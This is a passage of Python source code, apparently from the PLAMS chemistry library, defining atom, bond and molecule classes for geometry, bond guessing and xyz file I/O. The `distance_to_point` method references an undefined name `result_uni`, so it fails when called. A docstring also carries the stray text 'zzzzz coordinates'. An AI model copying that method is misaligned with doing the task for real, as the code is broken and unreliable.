"""Return a string representation of this atom. Simplified version of :meth:`str` to work as a magic method."""
return self.str()
def __iter__(self):
"""Iteration through atom yields coordinates. Thanks to that instances of |Atom| can be passed to any method requiring point or vector as an argument."""
return iter(self.coords)
def _setx(self, value): self.coords = (value, self.coords[1], self.coords[2])
def _sety(self, value): self.coords = (self.coords[0], value, self.coords[2])
def _setz(self, value): self.coords = (self.coords[0], self.coords[1], value)
def _getx(self): return self.coords[0]
def _gety(self): return self.coords[1]
def _getz(self): return self.coords[2]
x = property(_getx, _setx)
y = property(_gety, _sety)
z = property(_getz, _setz)
def _getsymbol(self):
return PT.get_symbol(self.atnum)
def _setsymbol(self, symbol):
self.atnum = PT.get_atomic_number(symbol)
symbol = property(_getsymbol, _setsymbol)
def _getmass(self):
return PT.get_mass(self.atnum)
mass = property(_getmass)
def _getradius(self):
return PT.get_radius(self.atnum)
radius = property(_getradius)
def _getconnectors(self):
return PT.get_connectors(self.atnum)
connectors = property(_getconnectors)
def translate(self, vector, unit='angstrom'):
"""Move this atom in space by *vector*, expressed in *unit*.
*vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
self.coords = tuple(i + j*ratio for i,j in zip(self, vector))
def move_to(self, point, unit='angstrom'):
"""Move this atom to a given *point* in space, expressed in *unit*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
self.coords = tuple(i*ratio for i in point)
def distance_to(self, point, unit='angstrom', result_unit='angstrom'):
"""Measure the distance between this atom and *point*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
res = 0.0
for i,j in zip(self,point):
res += (i - j*ratio)**2
return Units.convert(math.sqrt(res), 'angstrom', result_unit)
def vector_to(self, point, unit='angstrom', result_unit='angstrom'):
"""Calculate a vector from this atom to *point*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
resultratio = Units.conversion_ratio('angstrom', result_unit)
return tuple((i*ratio-j)*resultratio for i,j in zip(point, self))
def angle(self, point1, point2, point1unit='angstrom', point2unit='angstrom',result_unit='radian'):
"""Calculate an angle between vectors pointing from this atom to *point1* and *point2*.
*point1* and *point2* should be iterable containers of length 3 (for example: tuple, |Atom|, list, numpy array). Values stored in them are expressed in, respectively, *point1unit* and *point2unit*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
num = numpy.dot(self.vector_to(point1, point1unit), self.vector_to(point2, point2unit))
den = self.distance_to(point1, point1unit) * self.distance_to(point2, point2unit)
return Units.convert(math.acos(num/den), 'radian', result_unit)
def rotate(self, matrix):
"""Rotate this atom according to rotation *matrix*.
*matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``).
.. note::
This method does not check if supplied matrix is a proper rotation matrix.
"""
matrix = numpy.array(matrix).reshape(3,3)
self.coords = tuple(numpy.dot(matrix, numpy.array(self.coords)))
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Bond (object):
"""A class representing a bond between two atoms.
An instance of this class has the following attributes:
* ``atom1`` and ``atom2`` -- two instances of |Atom| that form this bond
* ``order`` -- order of the bond. It is either an integer number or the floating point value stored in ``Bond.AR``, indicating aromatic bond
* ``mol`` -- a |Molecule| this bond belongs to
* ``properties`` -- a |Settings| instance storing all other information about this bond (initially it is populated with *\*\*other* keyword arguments passed to the constructor)
.. note::
Newly created bond is **not** added to ``atom1.bonds`` or ``atom2.bonds``. Storing information about |Bond| in |Atom| is relevant only in the context of the whole |Molecule|, so this information is updated by :meth:`~Molecule.add_bond`.
"""
AR = 1.5
def __init__(self, atom1, atom2, order=1, mol=None, **other):
self.atom1 = atom1
self.atom2 = atom2
self.order = order
self.mol = mol
self.properties = Settings(other)
def __str__(self):
"""Return string representation of this bond."""
return '(%s)--%1.1f--(%s)'%(str(self.atom1), self.order, str(self.atom2))
def __iter__(self):
"""Iterate over bonded atoms (``atom1`` first, then ``atom2``)."""
yield self.atom1
yield self.atom2
def is_aromatic(self):
"""Check if this bond is aromatic."""
return self.order == Bond.AR
def length(self, unit='angstrom'):
"""Return bond's length, expressed in *unit*."""
return self.atom1.distance_to(self.atom2, result_unit=unit)
def other_end(self, atom):
"""Return the atom on the other end of this bond with respect to *atom*.
*atom* has to be either ``atom1`` or ``atom2``, otherwise an exception is raised.
"""
if atom is self.atom1:
return self.atom2
elif atom is self.atom2:
return self.atom1
else:
raise MoleculeError('Bond.other_end: invalid atom passed')
def resize(self, atom, length, unit='angstrom'):
"""Change the length of the bond to *length*.
This method works in the following way: one of two atoms forming this bond is moved along the bond in such a way that new length is *length*, in *unit* (direction of the bond in space does not change). Atom indicated by *atom* has to be one of bond's atoms and it is the atom that is **not** moved.
"""
ratio = 1.0 - Units.convert(length, unit, 'angstrom')/self.length()
moving = self.other_end(atom)
moving.translate(tuple(i*ratio for i in moving.vector_to(atom)))
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Molecule (object):
"""A class representing basic molecule object.
An instance of this class has the following attributes:
* ``atoms`` -- a list of |Atom| objects that belong to this molecule
* ``bonds`` -- a list of |Bond| objects between atoms listed in ``atoms``
* ``lattice`` -- a list of lattice vectors, in case of periodic structures
* ``properties`` -- a |Settings| instance storing all other information about this molecule
.. note::
Each |Atom| in ``atoms`` list and each |Bond| in ``bonds`` list has a reference to the parent molecule. Moreover, each atom stores the list of bonds it's a part of and each bond stores references to atoms it bonds. That creates a complex net of references between objects that are part of a molecule. Consistency of this data is crucial for proper functioning of many methods. Because of that it is advised not to modify contents of ``atoms`` and ``bonds`` by hand. When you need to alter your molecule, methods :meth:`add_atom`, :meth:`delete_atom`, :meth:`add_bond` and :meth:`delete_bond` can be used to ensure that all these references are updated properly.
Creating a |Molecule| object for your calculation can be done in two ways. You can start with an empty molecule and manually add all atoms (and bonds, if needed)::
>>> mol = Molecule()
>>> mol.add_atom(Atom(atnum=1, coords=(0,0,0)))
>>> mol.add_atom(Atom(atnum=1, coords=(d,0,0)))
This approach can be useful for building small molecules, especially if you wish to parametrize some of atomic coordinates (like in :ref:`simple_example`), but in general it's not very practical. Usually one wants to import atomic coordinates from some external file::
>>> mol = Molecule('xyz/Benzene.xyz')
Constructor of a |Molecule| object accepts three arguments that can be used to supply this information from a file in your filesystem. *filename* should be a string with a path (absolute or relative) to such a file. *inputformat* describes the format of the file. Currently, the following formats are supported: ``xyz``, ``mol``, ``mol2`` and ``pdb``. If *inputformat* argument is not supplied, PLAMS will try to deduce it by examining the extension of the provided file, so in most of cases it is not needed to use *inputformat*, if only the file has the proper extension. Some formats (``xyz`` and ``pdb``) allow to store more than one geometry of a particular molecule within a single file. In such cases *geometry* argument can be used to indicate which (in order of appearance in the file) geometry to import. *other* keyword arguments passed to the constructor are used to populate ``properties`` |Settings|.
If a |Molecule| is initialized from an external file, the path to this file (*filename* argument) is stored in ``properties.source``. The base name of the file without extension is kept in ``properties.name``.
It is also possible to write a molecule to a file in one of the formats mentioned above. See :meth:`write` for details.
``lattice`` attribute is used to store information about lattice vectors in case of periodic structures. Some job types (|BANDJob|, |DFTBJob|) will automatically use that data while constructing input files. ``lattice`` should be a list of up to 3 vectors (for different types of periodicity: chain, slab or bulk), each of which needs to be a list or a tuple of 3 numbers.
Lattice vectors can be directly read and written to ``xyz`` files using the following convention (please mind the fact that this is an unofficial extension to the XYZ format)::
3
H 0.000000 0.765440 -0.008360
O 0.000000 0.000000 0.593720
H 0.000000 -0.765440 -0.008360
VEC1 3.000000 0.000000 0.000000
VEC2 0.000000 3.000000 0.000000
VEC3 0.000000 0.000000 3.000000
For 1D (2D) periodicity please supply only ``VEC1`` (``VEC1`` and ``VEC2``). Writing lattice vectors to ``xyz`` files can be disabled by simply reseting the ``lattice`` attribute::
>>> mol.lattice = []
|hspace|
Below the detailed description of available methods is presented. Many of these methods require passing atoms belonging to the molecule as arguments. It can by done by using a reference to an |Atom| object present it ``atoms`` list, but not by passing a number of an atom (its position within ``atoms`` list). Unlike some other tools, PLAMS does not use integer numbers as primary identifiers of atoms. It is done to prevent problems when atoms within a molecule are reordered or some atoms are deleted. References to |Atom| or |Bond| objects can be obtained directly from ``atoms`` or ``bonds`` lists, or with dictionary-like bracket notation::
>>> mol = Molecule('xyz/Ammonia.xyz')
>>> mol.guess_bonds()
>>> print mol
Atoms:
1 H 0.942179 0.000000 -0.017370
2 H -0.471089 0.815951 -0.017370
3 N 0.000000 0.000000 0.383210
4 H -0.471089 -0.815951 -0.017370
Bonds:
(1)--1.0--(3)
(2)--1.0--(3)
(3)--1.0--(4)
>>> at = mol[1]
>>> print at
H 0.942179 0.000000 -0.017370
>>> b = mol[(1,3)]
>>> print b
( H 0.942179 0.000000 -0.017370 )--1.0--( N 0.000000 0.000000 0.383210 )
>>> b = mol[(1,4)]
>>> print b
None
.. note::
Numbering of atoms within a molecule starts with 1.
However, if you feel more familiar with identifying atoms by natural numbers, you can use :meth:`set_atoms_id` to equip each atom of the molecule with ``id`` attribute equal to atom's position within ``atoms`` list. This method can also be helpful to track changes in your molecule during tasks that can reorder atoms.
"""
def __init__(self, filename=None, inputformat=None, geometry=1, **other):
self.atoms = []
self.bonds = []
self.lattice = []
self.properties = Settings(other)
if filename is not None :
self.read(filename, inputformat, geometry)
self.properties.source = filename
self.properties.name = os.path.splitext(os.path.basename(filename))[0]
#===================================================================================================
#==== Atoms/bonds manipulation =====================================================================
#===================================================================================================
def copy(self, atoms=None):
"""Return a copy of this molecule. New molecule has atoms, bonds and all other components distinct from original molecule (it is so called "deep copy").
By default the entire molecule is copied. It is also possible to copy only some part of the molecule, indicated by *atoms* argument. It should be a list of atoms that **belong to this molecule**. Only these atoms, together with any bonds between them, are copied and included in the returned molecule.
"""
if atoms is None:
return copy.deepcopy(self)
for at in self.atoms:
at._stay = False
for at in atoms:
at._stay = True
ret = copy.deepcopy(self)
for at in reversed(ret.atoms):
if at._stay is False:
ret.delete_atom(at)
del at._stay
for at in self.atoms:
del at._stay
return ret
def add_atom(self, atom, adjacent=None):
"""Add new *atom* to this molecule.
*atom* should be an |Atom| instance that does not belong to the molecule. Bonds between the new atom and other atoms of the molecule can be automatically added based on *adjacent* argument. It should be a list describing atoms of the molecule that the new atom is connected to. Each element of *adjacent* list can either be a pair ``(Atom, order)`` to indicate new bond's order (use ``Bond.AR`` for aromatic bonds) or an |Atom| instance (a single bond is inserted in this case).
Example::
>>> mol = Molecule() #create an empty molecule
>>> h1 = Atom(symbol='H', coords=(1.0, 0.0, 0.0))
>>> h2 = Atom(symbol='H', coords=(-1.0, 0.0, 0.0))
>>> o = Atom(symbol='O', coords=(0.0, 1.0, 0.0))
>>> mol.add_atom(h1)
>>> mol.add_atom(h2)
>>> mol.add_atom(o)
>>> mol.add_atom(Atom(symbol='C', coords=(0.0, 0.0, 0.0)), adjacent=[h1, h2, (o,2)])
"""
self.atoms.append(atom)
atom.mol = self
if adjacent is not None:
for adj in adjacent:
if isinstance(adj, tuple):
self.add_bond(atom, adj[0], adj[1])
else:
self.add_bond(atom, adj)
def delete_atom(self, atom):
"""Delete *atom* from this molecule.
*atom* should be an |Atom| instance that belongs to the molecule. All bonds containing this atom are removed too.
Examples::
>>> #delete all hydrogens
>>> mol = Molecule('protein.pdb')
>>> hydrogens = [atom for atom in mol if atom.atnum == 1]
>>> for i in hydrogens: mol.delete_atom(i)
::
>>> #delete first two atoms
>>> mol = Molecule('geom.xyz')
>>> mol.delete_atom(mol[1])
>>> mol.delete_atom(mol[1]) #since the second atom of original molecule is now the first
"""
if atom.mol != self:
raise MoleculeError('delete_atom: passed atom should belong to the molecule')
try:
self.atoms.remove(atom)
except:
raise MoleculeError('delete_atom: invalid argument passed as atom')
for b in reversed(atom.bonds):
self.delete_bond(b)
def add_bond(self, arg1, arg2=None, order=1):
"""Add new bond to this molecule.
This method can be used in two different ways. You can call it with just one argument being a |Bond| instance (other arguments are then ignored)::
>>> b = Bond(mol[2], mol[4], order=Bond.AR) #create aromatic bond between 2nd and 4th atom
>>> mol.add_bond(b)
Other way is to pass two atoms (and possibly bond order) and new |Bond| object will be created automatically::
>>> mol.add_bond(mol[2], mol[4], order=Bond.AR)
In both cases atoms that are to be bond have to belong to the molecule, otherwise an exception is raised.
"""
if isinstance(arg1, Atom) and isinstance(arg2, Atom):
newbond = Bond(arg1, arg2, order=order)
elif isinstance(arg1, Bond):
newbond = arg1
else:
raise MoleculeError('add_bond: invalid arguments passed')
if newbond.atom1.mol == self and newbond.atom2.mol == self:
newbond.mol = self
self.bonds.append(newbond)
newbond.atom1.bonds.append(newbond)
newbond.atom2.bonds.append(newbond)
else:
raise MoleculeError('add_bond: bonded atoms have to belong to the molecule')
def delete_bond(self, arg1, arg2=None):
"""Delete bond from this molecule
Just like :meth:`add_bond`, this method accepts either a single argument that is a |Bond| instance, or two arguments being instances of |Atom|. In both cases objects used as arguments have to belong to the molecule.
"""
if isinstance(arg1, Atom) and isinstance(arg2, Atom):
delbond = self.find_bond(arg1, arg2)
elif isinstance(arg1, Bond):
delbond = arg1
else:
raise MoleculeError('delete_bond: invalid arguments passed')
if delbond in self.bonds:
delbond.mol = None
self.bonds.remove(delbond)
delbond.atom1.bonds.remove(delbond)
delbond.atom2.bonds.remove(delbond)
def delete_all_bonds(self):
"""Delete all bonds from the molecule."""
for b in reversed(self.bonds):
self.delete_bond(b)
def find_bond(self, atom1, atom2):
"""Find and return a bond between *atom1* and *atom2*. Both atoms have to belong to the molecule. If a bond between chosen atoms does not exist, ``None`` is returned."""
if atom1.mol != self or atom2.mol != self:
raise MoleculeError('find_bond: atoms passed as arguments have to belong to the molecule')
for b in atom1.bonds:
if atom2 is b.other_end(atom1):
return b
return None
def set_atoms_id(self):
"""Equip each atom of this molecule with ``id`` attribute equal to its position within ``atoms`` list."""
for i,at in enumerate(self.atoms):
at.id = i+1
def unset_atoms_id(self):
"""Delete ``id`` attributes of all atoms."""
for at in self.atoms:
try:
del at.id
except AttributeError:
pass
def neighbors(self, atom):
"""Return a list of neighbors of *atom* within this molecule.
*atom* has to belong to the molecule. Returned list follows the same order as ``bonds`` list of *atom*.
"""
if atom.mol != self:
raise MoleculeError('neighbors: passed atom should belong to the molecule')
return [b.other_end(atom) for b in atom.bonds]
def separate(self):
"""Separate this molecule into connected components.
Returned is a list of new |Molecule| objects (all atoms and bonds are disjoint with original molecule). Each element of this list is identical to one connected component of the base molecule. A connected component is a subset of atoms such that there exists a path (along one or more bonds) between any two atoms.
Example::
>>> mol = Molecule('/xyz_dimers/NH3-H2O.xyz')
>>> mol.guess_bonds()
>>> print(mol)
Atoms:
1 N -1.395591 -0.021564 0.000037
2 H -1.629811 0.961096 -0.106224
3 H -1.862767 -0.512544 -0.755974
4 H -1.833547 -0.330770 0.862307
5 O 1.568501 0.105892 0.000005
6 H 0.606736 -0.033962 -0.000628
7 H 1.940519 -0.780005 0.000222
Bonds:
(5)--1.0--(7)
(5)--1.0--(6)
(1)--1.0--(3)
(1)--1.0--(4)
(1)--1.0--(2)
>>> x = mol.separate()
>>> for i in x: print(i)
Atoms:
1 N -1.395591 -0.021564 0.000037
2 H -1.629811 0.961096 -0.106224
3 H -1.862767 -0.512544 -0.755974
4 H -1.833547 -0.330770 0.862307
Bonds:
(1)--1.0--(3)
(1)--1.0--(4)
(1)--1.0--(2)
Atoms:
1 O 1.568501 0.105892 0.000005
2 H 0.606736 -0.033962 -0.000628
3 H 1.940519 -0.780005 0.000222
Bonds:
(1)--1.0--(3)
(1)--1.0--(2)
"""
frags = []
clone = self.copy()
for at in clone:
at._visited = False
def dfs(v, mol):
v._visited = True
v.mol = mol
for e in v.bonds:
e.mol = mol
u = e.other_end(v)
if not u._visited:
dfs(u, mol)
for src in clone.atoms:
if not src._visited:
m = Molecule()
dfs(src, m)
frags.append(m)
for at in clone.atoms:
del at._visited
at.mol.atoms.append(at)
for b in clone.bonds:
b.mol.bonds.append(b)
return frags
def guess_bonds(self):
"""Try to guess bonds in the molecule based on types and positions of atoms.
All previously existing bonds are removed. New bonds are generated based on interatomic distances and information about maximal number of bonds for each atom type (``connectors`` property, taken from |PeriodicTable|).
The problem of finding molecular bonds for a given set of atoms in space does not have a general solution, especially considering the fact the chemical bond is itself not a precisely defined concept. For every method, no matter how sophisticated, there will always be corner cases for which the method produces disputable results. Moreover, depending on the context (area of application) the desired solution for a particular geometry may vary. Please do not treat this method as an oracle always providing proper solution. Algorithm used here gives very good results for geometries that are not very far from optimal geometry, especially consisting of lighter atoms. All kinds of organic molecules, including aromatic ones, usually work very well. Problematic results can emerge for transition metal complexes, transition states, incomplete molecules etc.
The algorithm used scales as *n log n* where *n* is the number of atoms.
.. warning::
This method works reliably only for geometries representing complete molecules. If some atoms are missing (for example, a protein without hydrogens) the resulting set of bonds would usually contain more bonds or bonds with higher order than expected.
"""
def element(order, ratio, atom1, atom2):
eford = order
if order == 1.5:
eford = 1.15
elif order == 1 and {atom1.symbol, atom2.symbol} == {'C', 'N'}:
eford = 1.11
return ((eford+0.9)*ratio, order, ratio, atom1, atom2)
self.delete_all_bonds()
dmax = 1.28
cubesize = dmax*2.1*max([at.radius for at in self.atoms])
cubes = {}
for i,at in enumerate(self.atoms):
at._id = i+1
at.free = at.connectors
at.cube = tuple(map(lambda x: int(math.floor(x/cubesize)), at.coords))
if at.cube in cubes:
cubes[at.cube].append(at)
else:
cubes[at.cube] = [at]
neighbors = {}
for cube in cubes:
neighbors[cube] = []
for i in range(cube[0]-1, cube[0]+2):
for j in range(cube[1]-1, cube[1]+2):
for k in range(cube[2]-1, cube[2]+2):
if (i,j,k) in cubes:
neighbors[cube] += cubes[(i,j,k)]
heap = []
for at1 in self.atoms:
if at1.free > 0:
for at2 in neighbors[at1.cube]:
if (at2.free > 0) and (at1._id < at2._id):
ratio = at1.distance_to(at2)/(at1.radius+at2.radius)
if (ratio < dmax):
heap.append(element(0, ratio, at1, at2))
#I hate to do this, but I guess there's no other way :/ [MH]
if (at1.atnum == 16 and at2.atnum == 8):
at1.free = 6
elif (at2.atnum == 16 and at1.atnum == 8):
at2.free = 6
elif (at1.atnum == 7):
at1.free += 1
elif (at2.atnum == 7):
at2.free += 1
heapq.heapify(heap)
for at in self.atoms:
if at.atnum == 7:
if at.free > 6:
at.free = 4
else:
at.free = 3
while heap:
val, o, r, at1, at2 = heapq.heappop(heap)
step = 1 if o in [0,2] else 0.5
if at1.free >= step and at2.free >= step:
o += step
at1.free -= step
at2.free -= step
if o < 3:
heapq.heappush(heap, element(o,r,at1,at2))
else:
self.add_bond(at1,at2,o)
elif o > 0:
if o == 1.5:
o = Bond.AR
self.add_bond(at1,at2,o)
def dfs(atom, par):
atom.arom += 1000
for b in atom.bonds:
oe = b.other_end(atom)
if b.is_aromatic() and oe.arom < 1000:
if oe.arom > 2:
return False
if par and oe.arom == 1:
b.order = 2
return True
if dfs(oe, 1-par):
b.order = 1 + par
return True
for at in self.atoms:
at.arom = len(list(filter(Bond.is_aromatic, at.bonds)))
for at in self.atoms:
if at.arom == 1:
dfs(at, 1)
for at in self.atoms:
del at.cube,at.free,at._id,at.arom
#===================================================================================================
#==== Geometry operations ==========================================================================
#===================================================================================================
def translate(self, vector, unit='angstrom'):
"""Move this molecule in space by *vector*, expressed in *unit*.
*vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*.
"""
for at in self.atoms:
at.translate(vector, unit)
def rotate(self, matrix):
"""Rotate this molecule according to rotation *matrix*.
*matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``).
.. note::
This method does not check if supplied matrix is a proper rotation matrix.
"""
for at in self.atoms:
at.rotate(matrix)
def rotate_bond(self, bond, atom, angle, unit='radian'):
"""Rotate given *bond* by an *angle* expressed in *unit*.
*bond* should be chosen in such a way, that it divides the molecule into two parts (using a bond being part of a ring results in an error). *atom* has to belong to *bond* and is used to pick which "half" of the molecule is rotated. Positive angle denotes counterclockwise rotation (looking along the bond, from the stationary part of the molecule).
"""
if atom not in bond:
raise MoleculeError('rotate_bond: atom has to belong to the bond')
atoms_to_rotate = {atom}
def dfs(v):
for e in v.bonds:
if e is not bond:
u = e.other_end(v)
if u not in atoms_to_rotate:
atoms_to_rotate.add(u)
dfs(u)
dfs(atom)
if len(atoms_to_rotate) == len(self):
raise MoleculeError('rotate_bond: chosen bond does not divide molecule')
other_end = bond.other_end(atom)
v = numpy.array(other_end.vector_to(atom))
v /= numpy.linalg.norm(v)
W = numpy.array([[0, -v[2], v[1]],
[v[2], 0, -v[0]],
[-v[1], v[0], 0]])
angle = Units.convert(angle, unit, 'radian')
a1 = math.sin(angle)
a2 = 2 * math.pow(math.sin(0.5 * angle), 2)
rotmat = numpy.identity(3) + a1 * W + a2 * numpy.dot(W,W)
trans = numpy.array(other_end.vector_to((0,0,0)))
for at in atoms_to_rotate:
at.translate(trans)
at.rotate(rotmat)
at.translate(-trans)
def closest_atom(self, point, unit='angstrom'):
"""Return the atom of this molecule that is the closest one to some *point* in space.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*.
"""
dist = float('inf')
for at in self.atoms:
newdist = at.distance_to(point, unit=unit)
if newdist < dist:
dist = newdist
ret = at
return ret
def distance_to_point(self, point, unit='angstrom', result_unit='angstrom'):
"""Calculate the distance between this molecule and some *point* in space (distance between *point* and :meth:`closest_atom`).
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
"""
at = self.closest_atom(point, unit)
return at.distance_to(point, unit, result_uni)
def distance_to_mol(self, other, result_unit='angstrom', return_atoms=False):
"""Calculate the distance between this molecule and some *other* molecule.
The distance is measured as the smallest distance between a pair of atoms, one belonging to each of the molecules. Returned distance is expressed in *result_unit*.
If *return_atoms* is ``False``, only a single number is returned. If *return_atoms* is ``True``, this method returns a tuple ``(distance, atom1, atom2)`` where ``atom1`` and ``atom2`` are atoms fulfilling the minimal distance, with atom1 belonging to this molecule and atom2 to *other*.
"""
dist = float('inf')
for at1 in self.atoms:
for at2 in other.atoms:
newdist = (at1.x-at2.x)**2 + (at1.y-at2.y)**2 + (at1.z-at2.z)**2
if newdist < dist:
dist = newdist
atom1 = at1
atom2 = at2
res = Units.convert(math.sqrt(dist), 'angstrom', result_unit)
if return_atoms:
return res, atom1, atom2
return res
def wrap(self, length, angle=2*math.pi, length_unit='angstrom', angle_unit='radian'):
"""wrap(self, length, angle=2*pi, length_unit='angstrom', angle_unit='radian')
Transform the molecule wrapping its x-axis around z-axis. This method is useful for building nanotubes or molecular wedding rings.
Atomic coordinates are transformed in the following way:
* zzzzz coordinates remain untouched
* x axis gets wrapped around the circle centered in the origin of new coordinate system. Each segment of x axis of length *length* ends up as an arc of a circle subtended by an angle *angle*. The radius of this circle is R = *length*/*angle*.
* part of the plane between the x axis and the line y=R is transformed into the interior of the circle, with line y=R being squashed into a single point - the center of the circle.
* part of the plane above line y=R is dropped
* part of the plane below x axis is transformed into outside of the circle
* transformation is done in such a way that distances along y axis are preserved
Before:
.. image:: _static/wrap.*
After:
.. image:: _static/wrap2.*
"""
length = Units.convert(length, length_unit, 'angstrom')
angle = Units.convert(angle, angle_unit, 'radian')
xs = [atom.x for atom in self.atoms]
if max(xs)-min(xs) > length:
raise MoleculeError('wrap: x-extension of the molecule is larger than length')
if angle < 0 or angle > 2*math.pi:
raise MoleculeError('wrap: angle must be between 0 and 2*pi')
R = length / angle
def map_ring(x,y):
return ((R-y) * math.cos(x/R), (R-y) * math.sin(x/R))
for at in self.atoms:
at.x, at.y = map_ring(at.x, at.y)
def get_center_of_mass(self, unit='angstrom'):
"""Return the center of mass of this molecule (as a tuple). Returned coordinates are expressed in *unit*."""
center = [0.0,0.0,0.0]
total_mass = 0.0
for at in self.atoms:
total_mass += at.mass
for i in range(3):
center[i] += at.mass*at.coords[i]
for i in range(3):
center[i] = Units.convert(center[i]/total_mass, 'angstrom', unit)
return tuple(center)
def get_mass(self):
"""Return mass of the molecule, expressed in atomic units."""
return sum([at.mass for at in self.atoms])
def get_formula(self):
"""Calculate the molecular formula for this molecule.
Returned value is a single string. It contains simple molecular formula (it only includes atom types and total number of atoms of each type)."""
atnums = [at.atnum for at in self.atoms]
s = set(atnums)
formula = ''
for i in s:
formula += PT.get_symbol(i) + str(atnums.count(i))
return formula
#===================================================================================================
#==== Magic methods ================================================================================
#===================================================================================================
def __len__(self):
"""Length of a molecule is the number of atoms."""
return len(self.atoms)
def __str__(self):
"""Return string representation of this molecule.
Information about atoms are printed in ``xyz`` format fashion -- each atom in a separate, enumerated line. Then, if the molecule contains any bonds, they are printed. Each bond is printed in a separate line, with information about both atoms and bond order. Example::
Atoms:
1 N 0.00000 0.00000 0.38321
2 H 0.94218 0.00000 -0.01737
3 H -0.47109 0.81595 -0.01737
4 H -0.47109 -0.81595 -0.01737
Bonds:
(1)----1----(2)
(1)----1----(3)
(1)----1----(4)
"""
s = ' Atoms: \n'
for i,atom in enumerate(self.atoms):
s += ('%5i'%(i+1)) + str(atom) + '\n'
if len(self.bonds) > 0:
for j,atom in enumerate(self.atoms):
atom._tmpid = j+1
s += ' Bonds: \n'
for bond in self.bonds:
s += ' (%d)--%1.1f--(%d)\n'%(bond.atom1._tmpid, bond.order, bond.atom2._tmpid)
for atom in self.atoms:
del atom._tmpid
if self.lattice:
s += ' Lattice:\n'
for vec in self.lattice:
s += ' %10.6f %10.6f %10.6f\n'%vec
return s
def __iter__(self):
"""Iterate over atoms."""
return iter(self.atoms)
def __getitem__(self, key):
"""Bracket notation can be used to access atoms or bonds directly.
If *key* is a single int (``mymol[i]``), return i-th atom of this molecule. If *key* is a pair of ints (``mymol[(i,j)]``), return bond between i-th and j-th atom (``None`` if such a bond does not exist).
This method is read only (things like ``mymol[3] = Atom(...)`` are forbidden). Numbering of atoms withing a molecule starts with 1.
"""
if isinstance(key, int):
if key == 0:
raise MoleculeError('Numbering of atoms starts with 1')
if key < 0:
return self.atoms[key]
return self.atoms[key-1]
if isinstance(key, tuple) and len(key) == 2:
if key[0] == 0 or key[1] == 0:
raise MoleculeError('Numbering of atoms starts with 1')
return self.find_bond(self.atoms[key[0]-1], self.atoms[key[1]-1])
def __add__(self, other):
"""Create a new molecule that is a sum of this molecule and *other*::
>>> newmol = mol1 + mol2
The new molecule has atoms, bonds and all other elements distinct from both components. ``properties`` of ``newmol`` are ``properties`` of ``mol1`` :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of ``mol2``.
"""
m = self.copy()
m += other
return m
def __iadd__(self, other):
"""Add *other* molecule to this one::
>>> protein += water
All atoms and bonds present in *other* are copied and copies are added to this molecule. ``properties`` of this molecule are :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of *other*.
"""
othercopy = other.copy()
self.atoms += othercopy.atoms
self.bonds += othercopy.bonds
for atom in self.atoms:
atom.mol = self
for bond in self.bonds:
bond.mol = self
self.properties.soft_update(othercopy.properties)
return self
def __copy__(self):
return self.copy()
#===================================================================================================
#==== File/format IO ===============================================================================
#===================================================================================================
def readxyz(self, f, frame):
def newatom(line):
lst = line.split()
shift = 1 if (len(lst) > 4 and lst[0] == str(i)) else 0
num = lst[0+shift]
if isinstance(num, str):
num = PT.get_atomic_number(num)
self.add_atom(Atom(atnum=num, coords=(lst[1+shift],lst[2+shift],lst[3+shift])))
def newlatticevec(line):
lst = line.split()
self.lattice.append((float(lst[1]),float(lst[2]),float(lst[3])))
fr = frame
begin, first, nohead = True, True, False
for line in f:
if first:
if line.strip() == '' : continue
first = False
try:
n = int(line.strip())
fr -= 1
except ValueError:
nohead = True
newatom(line)
elif nohead:
if line.strip() == '' : break
if 'VEC' in line.upper():
newlatticevec(line)
else:
newatom(line)
elif fr != 0:
try:
n = int(line.strip())
fr -= 1
except ValueError:
continue
else:
if begin:
begin = False
i = 1
if line:
self.properties['comment'] = line.rstrip()
else:
if i <= n:
newatom(line)
i += 1
elif 'VEC' in line.upper():
newlatticevec(line)
else:
break
if not nohead and fr > 0:
raise FileError('readxyz: There are only %i frames in %s' % (frame - fr, f.name))
def writexyz(self, f):
f.write(str(len(self)) + '\n')
if 'comment' in self.properties:
comment = self.properties['comment']
if isinstance(comment, list):
comment = comment[0]
f.write(comment)
f.write('\n')
for at in self.atoms:
f.write(str(at) + '\n')
for i,vec in enumerate(self.lattice):
f.write('VEC'+str(i+1) + '%14.6f %14.6f %14.6f\n'%tuple(vec))
def readmol(self, f, frame):
if frame != 1:
raise FileError('readmol: .mol files do not support multiple geometries')
comment = []
for i in range(4):
line = f.readline().rstrip()
if line:
spl = line.split()
if spl[len(spl)-1] == 'V2000':
natom = int(spl[0])
nbond = int(spl[1])
